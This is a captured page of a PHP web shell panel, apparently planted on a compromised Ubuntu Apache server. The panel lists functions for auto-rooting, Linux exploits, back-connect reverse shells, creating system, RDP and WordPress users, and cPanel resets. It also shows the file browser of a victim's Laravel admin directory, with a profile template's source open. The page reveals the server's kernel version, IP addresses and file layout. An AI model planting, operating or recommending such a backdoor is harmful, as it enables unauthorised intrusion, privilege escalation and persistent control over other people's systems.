Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.111.33
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
resources /
views /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
advertisements
[ DIR ]
drwxr-xr-x
blogs
[ DIR ]
drwxr-xr-x
category
[ DIR ]
drwxr-xr-x
homepage
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
orders
[ DIR ]
drwxr-xr-x
product_gallery
[ DIR ]
drwxr-xr-x
products
[ DIR ]
drwxr-xr-x
projects
[ DIR ]
drwxr-xr-x
services
[ DIR ]
drwxr-xr-x
types
[ DIR ]
drwxr-xr-x
contact_entries.blade.php
4.63
KB
-rw-r--r--
contactinfo.blade.php
2.43
KB
-rw-r--r--
content_pages.blade.php
6.86
KB
-rw-r--r--
dashboard.blade.php
833
B
-rw-r--r--
email_settings.blade.php
2.83
KB
-rw-r--r--
headerinfo.blade.php
3.32
KB
-rw-r--r--
login.blade.php
4.06
KB
-rw-r--r--
profile.blade.php
2.63
KB
-rw-r--r--
social_media_links.blade.php
3.94
KB
-rw-r--r--
subscribers.blade.php
3.88
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : profile.blade.php
@extends('admin.layouts.app') @section('contents') <div> <ul class="breadcrumb"> <li> <a href="#">User Profile</a> </li> </ul> </div> <div class="row"> <div class="box col-md-12"> <div class="box-inner"> <div class="box-header well" data-original-title=""> <h2><i class="glyphicon glyphicon-edit"></i> Profile</h2> </div> <div class="box-content"> <form action="{{ route('admin.update_profile',['id'=>Auth::user()->id]) }}" method="post" id="profile"> @csrf <div class="form-group"> <label for="old_password">Old Password</label> <input type="password" class="form-control required" name="old_password" id="old_password" placeholder=""> </div> <div class="form-group"> <label for="password">New Password</label> <input type="password" class="form-control required" name="password" id="password" placeholder=""> </div> <div class="form-group"> <label for="password_confirm">Confirm Password</label> <input type="password" class="form-control required" name="password_confirm" id="password_confirm" placeholder=""> </div> <button type="submit" class="btn btn-default">Update</button> </form> </div> </div> </div> </div> <div style="margin-bottom:70px"> </div> @endsection @push('scripts') <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.3/jquery.validate.min.js"></script> <script> $("#profile").validate({ rules: { password: { required: true, minlength: 8 }, password_confirm: { required: true, minlength: 8, equalTo: "#password" } } }); </script> @if(session()->has('success')) <script> Swal.fire({ icon: 'success', title: '{{ session()->get('success') }}' }) </script> @endif @if(session()->has('error')) <script> Swal.fire({ icon: 'error', title: '{{ session()->get('error') }}' }) </script> @endif @endpush
Close